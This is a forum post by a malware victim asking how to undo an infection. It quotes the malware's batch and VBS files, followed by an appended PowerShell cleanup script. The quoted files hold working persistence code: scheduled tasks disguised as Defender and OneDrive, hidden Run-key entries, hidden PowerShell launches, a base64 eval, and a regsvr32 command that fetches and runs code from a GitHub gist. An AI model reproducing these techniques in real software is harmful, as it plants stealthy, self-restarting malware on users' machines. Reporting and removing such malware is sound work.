How to reverse what a virus changed and stop it from opening at startup

Thread starter: Zerlingg (Guest)
After getting stressed because a virus wouldn't stop opening a cmd every time I closed it, I started checking the files from the program that installed it (because no antivirus has fixed this :( ) and then found these things:

The first thing that opens is a launcher.bat that gets run when trying to run the program, and this is what it does:

cd .. && cd data && cd source && cd data1 && cd data2
xcopy /s /Y data3 C:\Users\Public\Music /E /H
cd data3 && cd bin
schtasks /create /tn "OneDrive32" /tr "cmd /c start /min C:\Users\Public\Music\bin\java.bat" /sc minute /mo 2 /F
schtasks /create /tn "WindowsPhotos" /tr "cmd /c start /min C:\Users\Public\Music\bin\ghost.exe" /sc minute /mo 33 /F
schtasks /create /tn "Defender" /tr "regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/...w/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll" /sc minute /mo 32 /F
wscript.exe service.vbs && wscript.exe java.vbs
start ghost.exe
attrib +h C:\Users\Public\Music
exit



It changes "Defender", "WindowsPhotos" and "OneDrive32". It also starts running that "ghost.exe" and installs other things, like code from GitHub. I want to revert all of this so it stops the virus and the cmds. Also, let me show you other files I found in the C:\Users\Public\Music\bin\ directory that it hides (thankfully I found all of this because I always have hidden files shown).


java.vbs runs:


const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true

set O = CreateObject("Wscript.Shell")
D="HKCU\jaava"
H="cmd /c start /min C:\Users\Public\Music\bin\java.bat"
O.regwrite D,H,"REG_SZ"
O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34) , "REG_SZ"
O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'jaava').jaava;cmd /c $y" & Chrw(34),0,false



I took a look at Java.bat too:


cd C:\Users\Public\Music\bin && start /min jjs.bat && exit


And jjs.bat:


echo eval(new java.lang.String(java.util.Base64.decoder.decode(' '))); | powershell.exe -WindowStyle Hidden C:\Users\Public\Music\bin\svchost.exe


(inside the (' ') goes a really long text of random letters and numbers, but I don't want to paste it; I don't think it will help with anything)



I also checked Service.vbs:


const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true

set O = CreateObject("Wscript.Shell")
D="HKCU\alien34"
H="regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/...w/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll"
O.regwrite D,H,"REG_SZ"
O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive32", U & "cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34) , "REG_SZ"
O.Run "powershell -ExecutionPolicy Bypass -windowstyle hidden -Command " & chrw(34) & "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y" & Chrw(34),0,false



If you need anything else to check, just tell me; I will post in a comment if I find more things.
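A remediation script for the persistence shown in the post above, added here as an editor's example; it is not part of the original post. It removes exactly the items the posted files create: the three scheduled tasks, the two HKCU Run values, the HKCU root values jaava and alien34 that those Run values read their command from, and the hidden C:\Users\Public\Music\bin directory (quarantined rather than deleted, so the samples ghost.exe, 64.dll and the renamed svchost.exe survive for analysis). The quarantine path and the order of the steps are assumptions; every name and path comes from the post. Run it from an elevated PowerShell as the user whose profile was infected, since the Run values live in that user's hive.

```powershell
# Editor's example, not code from the original post.
# Reverses the persistence set up by launcher.bat, service.vbs and java.vbs as posted.
# Assumptions: the names/paths below exactly as they appear in the post; the quarantine
# folder is an arbitrary choice (anything outside C:\Users\Public\Music works).

$PayloadRoot = 'C:\Users\Public\Music'
$PayloadBin  = Join-Path $PayloadRoot 'bin'
$Quarantine  = 'C:\Quarantine\Music_bin_' + (Get-Date -Format 'yyyyMMdd_HHmmss')   # assumed path
$TaskNames   = @('OneDrive32', 'WindowsPhotos', 'Defender')   # created by launcher.bat
$RunKey      = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$RunValues   = @('cleaner', 'OneDrive32')                     # written by java.vbs / service.vbs
$RootValues  = @('jaava', 'alien34')                          # RegWrite "HKCU\jaava" = value under HKCU root

# 1. Scheduled tasks first: OneDrive32 fires every 2 minutes and would relaunch
#    java.bat while the rest of the cleanup runs.
foreach ($name in $TaskNames) {
    $task = Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
    if ($null -eq $task) { Write-Host "task $name not present"; continue }
    Write-Host "removing task $name -> $($task.Actions[0].Execute) $($task.Actions[0].Arguments)"
    Stop-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
    Unregister-ScheduledTask -TaskName $name -Confirm:$false
}

# 2. Kill anything running out of the payload tree or started with it on the command
#    line (the hidden cmd / powershell / wscript / regsvr32 chains and the fake svchost.exe).
Get-CimInstance Win32_Process |
    Where-Object { ($_.ExecutablePath -like "$PayloadRoot\*") -or ($_.CommandLine -like "*$PayloadRoot*") } |
    ForEach-Object {
        Write-Host "killing PID $($_.ProcessId): $($_.CommandLine)"
        Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue
    }

# 3. Run entries, then the HKCU root values they fetch their command line from.
foreach ($v in $RunValues) {
    $cur = Get-ItemProperty -Path $RunKey -Name $v -ErrorAction SilentlyContinue
    if ($cur) {
        Write-Host "removing Run\$v = $($cur.$v)"
        Remove-ItemProperty -Path $RunKey -Name $v
    }
}
foreach ($v in $RootValues) {
    $cur = Get-ItemProperty -Path 'HKCU:\' -Name $v -ErrorAction SilentlyContinue
    if ($cur) {
        Write-Host "removing HKCU\$v = $($cur.$v)"
        Remove-ItemProperty -Path 'HKCU:\' -Name $v
    }
}

# 4. Undo "attrib +h" on the directory and move bin\ to quarantine instead of deleting it.
if (Test-Path -LiteralPath $PayloadRoot) {
    $dir = Get-Item -LiteralPath $PayloadRoot -Force
    $dir.Attributes = $dir.Attributes -band (-bnot [IO.FileAttributes]::Hidden)
}
if (Test-Path -LiteralPath $PayloadBin) {
    New-Item -ItemType Directory -Path (Split-Path $Quarantine) -Force | Out-Null
    Move-Item -LiteralPath $PayloadBin -Destination $Quarantine -Force
    Write-Host "moved $PayloadBin to $Quarantine"
}

# 5. Verify that none of the known persistence points is left.
$remaining = New-Object System.Collections.Generic.List[string]
foreach ($name in $TaskNames) {
    if (Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue) { $remaining.Add("task $name") }
}
foreach ($v in $RunValues) {
    if (Get-ItemProperty -Path $RunKey -Name $v -ErrorAction SilentlyContinue) { $remaining.Add("Run\$v") }
}
foreach ($v in $RootValues) {
    if (Get-ItemProperty -Path 'HKCU:\' -Name $v -ErrorAction SilentlyContinue) { $remaining.Add("HKCU\$v") }
}
if (Test-Path -LiteralPath $PayloadBin) { $remaining.Add($PayloadBin) }

if ($remaining.Count -eq 0) {
    Write-Host 'clean: none of the posted persistence points remain'
} else {
    Write-Warning ('still present: ' + ($remaining -join ', '))
}
```

The script prints each item before removing it, so the output doubles as a record of what was on the machine. Three things it cannot cover from what is in the post: the base64 blob in jjs.bat is executed by the renamed binary in bin\ and may have changed more than the posted files show; xcopy /E /H copied everything in data3 into Public\Music, so look for files there outside bin\; and the program's own data\source\data1\data2\data3 tree is still the installer, so running launcher.bat again puts everything back. The gist URL in the Defender task is truncated in the post, and the script never fetches it.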
